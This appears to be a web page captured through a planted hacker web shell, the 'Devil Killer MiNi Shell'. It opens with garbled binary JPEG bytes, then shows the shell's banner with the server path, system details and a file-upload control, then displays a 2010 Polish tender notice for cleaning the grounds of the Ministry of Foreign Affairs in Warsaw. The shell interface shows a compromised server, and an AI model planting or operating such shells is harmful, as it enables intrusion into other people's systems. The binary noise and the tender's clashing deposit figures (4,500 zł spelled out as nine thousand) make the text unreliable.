JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100301/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100301/45027-N-2010.html

<p class="kh_header"><b>Warszawa: Utrzymanie w czystości terenów wokół kompleksu budynków Ministerstwa Spraw Zagranicznych
ZO/7530/7A/2010</b><br>
<b>Numer ogłoszenia: 45027 - 2010; data zamieszczenia: 01.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Obsługi Ministerstwa Spraw Zagranicznych , Al. Szucha 23, 00-580 Warszawa, woj. mazowieckie, tel. 022 5239962, faks 022 6283363.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.msz.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie w czystości terenów wokół kompleksu budynków Ministerstwa Spraw Zagranicznych
ZO/7530/7A/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest utrzymanie na bieżąco w nienagannej czystości terenów wokół kompleksu Ministerstwa Spraw Zagranicznych położonych w Warszawie przy 
-Al. Szucha 23
-Al. Szucha 23A
-Al. Szucha 21
-Litewska 2/4
Przedmiotem zamówienia jest wykonywanie czynności w celu utrzymania w czystości terenów przyległych do budynków Ministerstwa Spraw Zagranicznych o powierzchni 9483 m2 w okresie od 01.04.2010 do 31.03.2011 r.
Szczegółowy wykaz powierzchni przeznaczonych do utrzymania w nienagannej czystości otaczających kompleks budynków Ministerstwa Spraw Zagranicznych przedstawia  załącznik nr 4 do siwz
 
Wykonawca zobowiązany będzie do utrzymania w nienagannej czystości  powierzchni  określonej w załączniku nr 4 do siwz w następujących odstępach czasowych 

1 codziennie:
 -  utrzymanie w nienagannej czystości dróg wewnętrznych, chodników, parkingów, podwórek wewnętrznych, bram wjazdowych ,,A,, i ,,B,, zatoki parkingowej przed wejściem głównym, powierzchni garaży naziemnych i podziemnych oraz  wyjazdu awaryjnego z garażu, prace z tym związane należy wykonać  do  godz. 7:00 rano, 
 -  opróżnianie zawartości koszy oraz utrzymanie w nienagannej czystości   garaży naziemnych i podziemnych przy Al. Szucha 23, Al. Szucha 23A, Al. Szucha 21 i wyrzucanie odpadów do kontenerów na śmieci, prace należy wykonać  do godz. 7:00 rano,
 -   wystawianie kontenerów ze śmieciami  z garażu (poziom minus dwa) przy Al. Szucha 21 o godzinie 6:00 rano w celu opróżnienia ich przez wyspecjalizowaną firmę zewnętrzną, a po ich opróżnieniu wstawianie ich na poprzednie miejsce,
 - usuwanie na bieżąco wszelkich nieczystości wokół budynków objętych  przedmiotem zamówienia
 -  sprawdzanie i opróżnianie koszy na śmieci, popielniczek (  na bieżąco na terenie całego kompleksu, począwszy od godz. 6:00 do godz. 19:00),
 -  stałe utrzymywanie  czystości w obrębie wejść głównych i bocznych do budynków i schodów wejścia głównego w godz.     6:00 - 19:00,
- utrzymywanie na bieżąco w nienagannej czystości oraz mycie pomieszczeń, w których  znajdują się pojemniki na odpady komunalno - bytowe,
- bieżące usuwanie z elewacji  pajęczyn  i dbanie o jej czystość,
2 raz na miesiąc
- mycie posadzek w garażach, parkingach zadaszonych w  ostatnim tygodniu  miesiąca (Zamawiający zastrzega sobie możliwość zlecenia dodatkowego mycia posadzek w garażach  w zależności od bieżących potrzeb).
Wykonawca zobowiązany będzie również do:
a) w okresie wiosenno - letnim:
-    wykonawca ma zapewnić minimum 2 pracowników od poniedziałku do piątku w godz. od 6:00 do 18:00,  1 pracownika w godz. od 18:00 do 20:00, oraz w soboty i niedziele 1 pracownika w godz. od 6:00 do 15:00,
  - bieżącego utrzymania w należytej czystości fontanny ( wyławianie opadających liści i innych zanieczyszczeń, uzdatnianie wody poprzez dosypywanie odpowiednich środków chemicznych );
b) w okresie  jesiennym:
-    wykonawca ma zapewnić minimum 2 pracowników od poniedziałku do piątku w godz. od 6:00 do 18:00, 1 pracownika w godz. od 18:00 do 20:00, oraz w soboty i niedziele 1 pracownika w godz. od 6:00 do 15:00,
- bieżącego utrzymania w należytej czystości fontanny ( wyławianie opadających liści i innych zanieczyszczeń, uzdatnianie wody poprzez dosypywanie odpowiednich środków chemicznych);
c) w okresie zimowym:
-    wykonawca ma zapewnić minimum 4 pracowników od poniedziałku do piątku w godz. od 6:00 do 18:00,  2 pracowników w godz. od 18:00 do 20:00, oraz w soboty i niedziele 2 pracowników w godz. od 6:00 do 15:00.
 - zapobieganie oblodzeniem  poprzez posypywanie piaskiem lub innym środkiem chemicznym powodującym, likwidację oblodzenia ciągów komunikacyjnych, podwórek wewnętrznych, zatoki parkingowej, powierzchni garażowych (budynek  biurowo-garażowy przy Al. Szucha 23A,  Al.  Szucha  23,  Al. Szucha 21),  
- do usuwania  śniegu należy przystąpić natychmiast po  wystąpieniu opadów, a następnie jeśli śnieg pada nieprzerwanie należy usuwać go na bieżąco aż do momentu gdy opady zanikną a  śnieg zostanie usunięty,
 -  wykonawca zobowiązany jest do bieżącego wywożenia śniegu we własnym zakresie i na własny koszt, 
 -  wszystkie wejścia do budynków tj. schody wejściowe, bramy wjazdowe, podwórka wewnętrzne, wyjazd awaryjny, zatoka parkingowa oraz ciągi komunikacyjne prowadzące do nich muszą być oczyszczone ze śniegu do godziny 7:00 rano.
Wykonawca zobowiązany będzie do utrzymania w nienagannej czystości 
 powierzchni zewnętrznych na terenie  obiektów objętych przedmiotem zamówienia w okresie:
            
-wiosenno - letnim przez sześć dni w tygodniu, tj. od poniedziałku do piątku w godzinach od 6:00 do 20:00, w soboty od 6:00 do 18:00.

Czas trwania okresów wiosenno letniego i jesienno-zimowego  został ustalony na podstawie pór roku jakie występują w klimacie środkowo-europejskim, np. okres jesienno-zimowy rozpoczyna się z nastaniem jesieni, tj. 21 września każdego roku, a kończy się z nastaniem wiosny, tj. 21 marca każdego roku.
Wyjątkiem od powyższej zasady są dni z występującymi opadami śniegu, kiedy bezwzględnie wymagane jest utrzymywanie stałych dyżurów całodobowych ekip do bieżącego usunięcia  śniegu i gołoledzi.                  
W okresie całego roku Zamawiający wymaga pełnienia dyżurów w święta narodowe w godzinach 6:00 - 15:00. 
Zamawiający nie przewiduje dodatkowego wynagrodzenia za wykonywanie w/w. dyżurów.
Zamawiający dopuszcza możliwość:
-jednostronnego zmniejszenia ilości sprzątanej powierzchni bez zgody Wykonawcy, za uprzednim tygodniowym pisemnym powiadomieniem,
- zwiększenia ilości sprzątanej powierzchni za zgodą Wykonawcy w ramach ewentualnego zamówienia uzupełniającego.

Wykonawca ponosić będzie odpowiedzialność materialną za wszelkie szkody powstałe z jego winy lub z przyczyn leżących po jego stronie w czasie realizacji  zamówienia.

Wykonawca zobowiązany jest  do zapewnienia odpowiedniego sprzętu oraz środków chemicznych do wykonywania usługi objętej niniejszą umową. Stosowane środki chemiczne muszą posiadać polskie atesty i być dopuszczone na rynku krajowym.
Wykonawca zapewni  pełnienie dyżurów w soboty, niedziele i święta (szczególnie w okresie jesienno-zimowym) których konieczność wprowadzenia  uzależnia się od warunków atmosferycznych   ( opady śniegu i oblodzenia ).
Wykonawca wykaże się  odpowiednią ilością sprzętu i zatrudnionych pracowników zapewniającą należyte wykonanie usługi w czasie trwania umowy.
Wykonawca zobowiązany jest do zapewnienia w miejscu wykonywania prac objętych niniejszą  umową  warunków bezpieczeństwa i higieny pracy zgodnie z obowiązującymi  w  tym zakresie przepisami prawa.
Wykonawca wyznaczy osobę nadzorującą swoich pracowników upoważnioną do stałego kontaktu z Działem Administracji Zarządu Obsługi i zapewni  łączność telefoniczną z tą osobą na własny koszt.
Wykonawca wyposaży swoich pracowników w jednolite ubrania robocze   z widocznym logo firmy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zakres ewentualnego  zamówienia uzupełniającego będzie pokrywał się z zakresem zamówienia podstawowego i nie będzie przekraczał 20 % zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.61.00.00-6, 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w kwocie: 4 500,00 zł (słownie:  dziewięć tysięcy złotych).
 Wadium należy wnieść przed upływem terminu składania ofert.
 Wadium może być wnoszone w jednej lub kilku z następujących form:
a) pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju  Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późn. zm.).
 W przypadku wniesienia wadium w formie pieniężnej należy dokonać przelewu na
 rachunek bankowy Zamawiającego  w Banku PEKAO S.A. O/Warszawa 
12 1240 6003 1111 0000 4945 1926.

 W przypadku wadium wnoszonego w pieniądzu należy przedłożyć oryginał lub
kserokopię (poświadczoną za zgodność z oryginałem) polecenia przelewu bankowego lub dowód wpłaty. W przypadku wnoszenia wadium w innych formach: oryginał dokumentu wadialnego (poręczenia lub gwarancji) należy załączyć do oferty. 

UWAGA! Zamawiający prosi Wykonawców o nie zszywanie z pozostałą częścią oferty oryginału dokumentu wadialnego, z uwagi na to, iż dokument ten zostanie po otwarciu ofert zdeponowany w kasie Zamawiającego. Kopia dokumentu wadialnego (poręczenia lub  gwarancji), potwierdzona za zgodność z oryginałem przez Wykonawcę winna stanowić część oferty (winna być trwale zszyta z zasadniczą treścią oferty).
 W przypadku wniesienia wadium wnoszonego w formie gwarancji bankowej lub gwarancji ubezpieczeniowej, z treści tych gwarancji musi w szczególności jednoznacznie wynikać:
a) zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty całej kwoty wadium nieodwołalnie i bezwarunkowo na pierwsze żądanie Zamawiającego (beneficjenta gwarancji), zawierające oświadczenie, że zaistniały okoliczności, o których mowa w pkt. 8.11 siwz.;
b) termin obowiązywania gwarancji, który nie może być krótszy niż termin związania ofertą;
c) miejsce i termin zwrotu gwarancji.
  Zamawiający zwróci wadium wszystkim wykonawcom  niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem pkt. 8.11 lit. c) siwz.
 Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego   oraz wniesieniu zabezpieczenia należytego wykonania umowy.
  Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał      ofertę przed upływem terminu składania ofert.
Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie pkt. 8.7. siwz, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
Zamawiający zatrzyma wadium wraz z odsetkami, jeżeli:
a) Wykonawca, którego oferta została wybrana odmówi podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy,
c) Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy PZP, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie,
d) Wykonawca nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisał sposobu dokonywania oceny tego warunku. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych  w pkt 6.1 i 6.2 siwz przy użyciu formuły SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się odpowiednim doświadczeniem w zakresie niezbędnym do wykazania spełnienia powyższego warunku  tj., w okresie ostatnich trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali należycie, a w przypadku świadczeń okresowych lub ciągłych również wykonują, minimum 2 usługi polegające na utrzymaniu w czystości terenów zewnętrznych polegających m.in. na bieżącym utrzymaniu czystości dróg wewnętrznych, podwórek, parkingów, usuwaniu śniegu i oblodzenia, o wartości co najmniej 150 000,00 zł brutto każda.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisał sposobu dokonywania oceny tego warunku. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych  w pkt 6.1 i 6.2 siwz przy użyciu formuły SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia, tj.  osoby wskazane przez wykonawcę do wykonywania przedmiotu zamówienia /muszą posiadać:
- aktualne zaświadczenia o niekaralności. Wykaz pracowników wyznaczonych do realizacji przedmiotu zamówienia będzie zweryfikowany ( opiniowany ) na podstawie wewnętrznych przepisów MSZ w związku z ustawą z dnia 22.01.1999r. o ochronie informacji niejawnych ( Dz. U. z 1999 r., Nr 11, poz. 95 z późniejszymi zmianami ).

 -poświadczenia bezpieczeństwa w zakresie ochrony informacji niejawnych o klauzuli co najmniej, poufne , zgodnie z art. 27 i art. 67 ust. 2 pkt. 1,2 i 3 Ustawy o ochronie informacji niejawnych z dnia 22.01.1999 r. wystawione dla osób wyznaczonych do wykonywania przedmiotu zamówienia oraz osób nadzorujących wykonanie przedmiotu zamówienia ze strony Wykonawcy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisał sposobu dokonywania oceny tego warunku. Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu, na podstawie załączonych do oferty dokumentów i oświadczeń wymaganych  w pkt 6.1 i 6.2 siwz przy użyciu formuły SPEŁNIA/NIE SPEŁNIA</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
